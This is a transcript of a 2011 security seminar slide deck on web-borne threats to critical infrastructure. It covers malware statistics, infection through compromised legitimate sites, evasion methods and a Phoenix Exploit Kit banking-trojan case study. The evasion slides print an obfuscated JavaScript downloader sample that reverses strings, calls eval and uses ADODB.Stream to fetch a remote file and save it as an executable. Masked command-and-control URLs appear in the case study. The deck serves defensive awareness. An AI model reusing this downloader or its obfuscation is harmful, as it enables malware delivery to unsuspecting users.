protect critical infrastructure by patrick de jong
DESCRIPTION
Seminar by Patrick de Jong during Infosecurity.be 2011TRANSCRIPT
Protecting your critical infrastructure
against web threats
Agenda:
• Critical infrastructure / web threats relation
• What are we facing (some statistics) and why
• Spreading the malware
• How do ‘they’ stay undetected?
• What harm can ‘they’ do?
• An example (Phoenix + Banker trojan)
• The message of the photo (opening slide)
Crititcal infrastructure Web threats?
Digitized control (remote) based on
standard OS like Windows or Linux and
using standard Ethernet , TCP/IP
‘Everything’ got connected.
Proprietary boxes with push
buttons and switches. without
any networking/connectivity
(later with proprietary OS and
networks).
Crititcal infrastructure – Web threats
Web-based Threats
92%Of new threats come
from the Web
Some statistics(what are we facing)
671%Increase in Web
Malware* over 2008
79,9%Web malware from legitimate
sites**
* AV-test currently (01-2011) counted 50 million samples
** Source: Websense
Some statistics(what are we facing)
Social
Networking
Social
Networking
Enterprise
SaaS
Enterprise
SaaS
Collaboration
Tools
Collaboration
Tools
Under 40%Current AV catch
rates*
Malware dead within
Web 2.0 Landscape
Client
Applications
Client
Applications
Social
Media
Social
Media
Media
Sharing
Media
Sharing
Interactive
Sharing
Interactive
Sharing
Mass
Comms
Mass
Comms
WEB 2.0 52%Malware dead within
24 hours**
10 billionWorld-wide blended
threat emails per day
* Source: M86 SecurityLabs
**Source: Panda Labs
Why? Driven by money.Just as Professional as Commercial Software
7
Why? Driven by money. Joint venture toolkits
Why? Driven by money. Data selling
Why? Mostly driven by money. Buying & Selling ‘victims’
Spreading the malwareemail spam and malicous websites
Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)
Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)
• Attacker benefits from someone else’s traffic and reputation
• Designed to defeat URL filtering & reputation software
• Most malware is now spread via compromised legitimate sites
How ‘they’ stay undetected
How they stay undetectedEvasive techniques
How they stay undetected Evasive techniques behind the scenes
How they stay undetected Code obfuscation
var fname = "C:\\mssync20.exe";
var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
RE("");
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");
RE(";)'r_','di'(etubirttAtes.r_");
RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var is_ok= 0;
try
{
var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");
is_ok= 1;
}
catch(e){}catch(e){}
if (is_ok!= 1)
{
try
{
var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");
is_ok= 1;
}
catch(e){}
}
function RE(s) { return eval(RV(s)); }
function RV(s)
{
var rev = "";
for (i = 0; i < s.length; i++)
{
rev = s.charAt(i) + rev;
}
return rev;
}
Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)
How they stay undetected Code obfuscation
How they stay undetected Dynamic code obfuscation
How they stay undetected Dynamic code obfuscation
How they stay undetected Private exploit encryption
NeoSploit
Infection process
… <malicious IFRAME>…
Generating obfuscated JS
Generating key and
sending it to the server
Using the key to generate
an encrypted script that is
sent back to the client
The browser opens the
encrypted script with key
and executes the JS code
Toolkits/Trojans/C&CWhat can they do with it
Toolkits/Trojans/C&CWhat can they do with it
Example: banking trojanMoney mules
Example: banking trojan
Using stolen FTP accounts, the cyber gang managed to inject an Iframe
that leads to the Phoenix Exploit Kit on thousands of legitimate
websites
The user accesses to a compromised websiteThe website content contains
redirection to the Phoenix Exploit Kit
Example: banking trojan
The user accesses to a compromised websiteredirection to the Phoenix Exploit Kit
The user’s PC exploited, the payload was downloaded successfully
The user is redirected to the Phoenix Exploit Kit 2.3
http://fan******.net/.ph/5
This specific configuration file contains injection orders
that will be used when the user accesses to the bank
Example: banking trojan
The malware downloads a configuration file from:
hxxp://uste*****.com.tr/Scripts/rd.bin
The gang doesn’t want to uncover the
main C&C to the world and uses the
Exploit Kit server as a proxy to the main
C&C server
After successful connection test, the bot reports
the C&C server about new installation to:
hxxp://195.***.**.147:3128/data/set.php
Example: banking trojan
Before the Trojan accesses to the Command & Control server
it verifies the user’s PC is connected to the internet.
http://google.com/webhp
hxxp://195.***.**.147:3128/data/set.php
Example: banking trojan
Besides the Trojan banker, the
server sends the user another
malware – Fake AVThe gang operates in multiple vectors, using social
engineering it tries to convince the user to buy fake AV
Example: banking trojan
The Trojan adds a script (on the client site) to every page in
the website. Of course the script is not located on the server,
and the user is redirected to the C&C to download it:
hxxp://cheap********card.info/brap/bscript.jsThe Trojan holds until the user accesses the bank
From that point the Trojan supervises all user activity
with the bank.
Example: banking trojan
The moment at which the user tries to commit a
transaction, the bot communicates with the C&C and
receives full information about the new transaction
that the bot is intending to commit.
The bot replaces the details in the ‘transaction
submit form’ and sends it to the server
Example: banking trojan
An example of a successful transaction generated by
the Trojan to the money mule account
Web-based vulnerability: The (mobile) user
33
Web-based vulnerability: The (mobile) user
• Roams Between various
ISPs:
– Wi-fi Airport and Hotel
– Home Office
– Other
• No Web Security Policy
Protection when Off the
Corporate Networks
• Readily Infected by
Compromised Legitimate
Sites
• Reconnects to Corporate
Networks after Trips
• Brings Potential Malware
back Into the Organisations’
Network
34
The photo
1. Evading dubious sites is key to keep malware out?
2. Websites with a good reputation won’t infect you?
3. As long as your AV is updated there is nothing to worry about?
4. Protecting the enduser workstation is very important when
protecting your critical security infrastructure?
Patrick de Jong
Sales Engineer Northern Europe
Phone: +31 33 454 3533
Mobile: +31 6 1373 2964
Email: [email protected]